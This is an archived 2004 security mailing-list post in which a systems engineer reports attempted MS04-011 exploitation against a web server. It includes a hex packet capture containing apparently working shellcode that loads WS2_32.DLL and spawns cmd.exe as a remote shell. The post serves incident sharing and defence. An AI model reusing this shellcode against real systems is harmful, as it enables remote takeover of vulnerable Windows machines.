Heads up: Looks like MS04-011 exploit is being tried against www.domain

From: James Riden (j.riden_at_massey.ac.nz)
Date: 04/27/04

  • Next message: David M. Dinner: "Re: Massive increase in spam volume?"
    To: incidents@securityfocus.com
    Date: Tue, 27 Apr 2004 15:14:29 +1200
    
    

    Seen as long ago as 25/04/2004. Haven't seen it used against any other
    servers here, so it's obviously targetted in some way. Example packet
    capture:

    000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
    010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
    020 : BE 98 EB 25 03 E7 3E D8 08 24 02 06 6C 59 6C 59 ...%..>..$..lYlY
    030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
    040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
    050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
    060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
    070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
    080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
    090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
    0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
    0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
    0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
    0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
    0e0 : 89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U
    0f0 : 58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P.
    100 : 55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e
    110 : 78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW
    120 : 57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E.
    130 : 50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U
    140 : F0 6A FF FF 55 E4 .j..U.

    -- 
    James Riden / j.riden@massey.ac.nz / Systems Security Engineer
    GPG public key available at: http://www.massey.ac.nz/~jriden/
    This post does not necessarily represent the views of my employer.
    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------
    

  • Next message: David M. Dinner: "Re: Massive increase in spam volume?"